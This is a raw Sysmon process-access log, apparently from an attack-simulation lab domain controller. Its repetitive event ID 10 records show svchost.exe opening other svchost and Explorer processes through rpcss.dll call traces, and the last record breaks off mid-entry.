10341000x800000000000000018397Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:46.835{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018396Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:46.835{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FD04-00000000A301}1156C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018395Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:46.835{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FD04-00000000A301}1156C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018394Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:46.835{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018393Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:46.835{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018392Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:46.835{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018391Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:46.835{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018390Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:46.834{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018389Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:46.834{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018388Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:46.834{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018387Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:46.834{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018386Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:46.834{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018385Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:46.834{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018384Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:46.834{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018383Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:46.834{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018382Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:46.833{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018381Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:46.833{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018380Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:46.833{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018379Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:46.833{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018378Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:46.833{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018377Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:46.833{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018376Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:46.833{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018375Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:46.832{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018374Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:46.832{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018373Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:46.832{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018372Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:46.832{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018371Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:46.832{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018370Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:46.832{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018369Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:46.832{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018368Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:46.831{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018367Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:46.831{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018366Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:46.831{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1100-00000000A301}1172C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018365Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:46.831{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1100-00000000A301}1172C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018364Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 